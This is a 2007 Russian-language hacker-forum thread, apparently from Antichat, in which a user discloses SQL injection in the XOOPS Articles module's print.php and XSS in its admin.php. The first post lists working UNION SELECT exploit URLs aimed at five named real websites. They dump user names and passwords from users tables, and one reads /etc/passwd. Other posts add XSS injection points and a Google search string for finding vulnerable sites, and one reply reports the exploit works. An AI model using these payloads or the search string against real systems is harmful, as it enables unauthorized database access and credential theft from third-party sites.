02.03.2007, 21:02
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
[xoops]
Сейчас вот нарыл в Xoops'e одну вещь... Нигде в багтраках не видел этой уязвимости...
Программа: Xoops(пока что х3 до какой версии + должен присутствовать модуль - Articles)
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
http://victim/modules/articles/print.php?id=-1{code}
URL производителя: www.xoops.org
Вот реальные примеры:
Код:
http://www.irc.by/modules/articles/print.php?id=-99+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(uname,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*
Код:
http://www.xoops2.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,convert(user()+using+cp1251),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops2_users/*
Код:
http://www.xoops.pl/modules/articles/print.php?id=-99+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+manga_users/*
Код:
http://www.dolbin.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,concat(uname,0x3a,pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*
Код:
http://www.titanic.com/modules/articles/print.php?id=-99+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
(c)ice1k :: AltST
Последний раз редактировалось ice1k; 03.03.2007 в 14:06..
|
|
|
02.03.2007, 21:04
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
зачёт +
молодец
|
|
|
|
03.03.2007, 00:29
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
Кстати... Если где-то вдруг это было - отпишитесь плз...
|
|
|
|
03.03.2007, 01:50
|
|
Познающий
Регистрация: 25.01.2007
Сообщений: 67
С нами:
10153766
Репутация:
25
|
|
неплохо, зачёт адназначна  |
|
|
|
03.03.2007, 03:16
|
|
Познающий
Регистрация: 19.02.2007
Сообщений: 45
С нами:
10117624
Репутация:
19
|
|
Респект, работает! Ставлю +.
|
|
|
|
03.03.2007, 14:01
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
Программа: XOOPS 2.0.16, возможно более ранние версии.
Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в
параметре "tplset" и "module"(при определенных условиях, приведенных в
примерах) в сценарии /modules/system/admin.php. Удаленный пользователь может
с помощью специально сформированного запроса выполнить произвольный код
сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для
успешной эксплуатации уязвимости целевой пользователь должен быть залогинен
как администратор.
Examples:
Код:
victim.xxx/modules/system/admin.php?fct=tplsets&op=listtpl&tplset=[XSS-here]&moddir=system
Код:
victim.xxx/modules/system/admin.php?fct=modulesadmin&op=install&module=[XSS-here]
URL производителя: http://xoops.org
(с)ice1k :: AltST
Последний раз редактировалось ice1k; 03.03.2007 в 14:04..
|
|
|
|
03.03.2007, 14:25
|
|
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
С нами:
10539746
Репутация:
1276
|
|
Вот держите сканер этой баги
http://www.google.com/
inurl:"/modules/articles/" Документация
Последний раз редактировалось DIAgen; 03.03.2007 в 14:28..
|
|
|
|
03.03.2007, 15:17
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
С нами:
10188326
Репутация:
1866
|
|
Сообщение от DIAgen
Вот держите сканер этой баги
а это ты зря... не нужно "развивать" скрипт-киддисов... 
|
|
|
|
03.03.2007, 14:26
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами:
10663526
Репутация:
715
|
|
респект  |
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
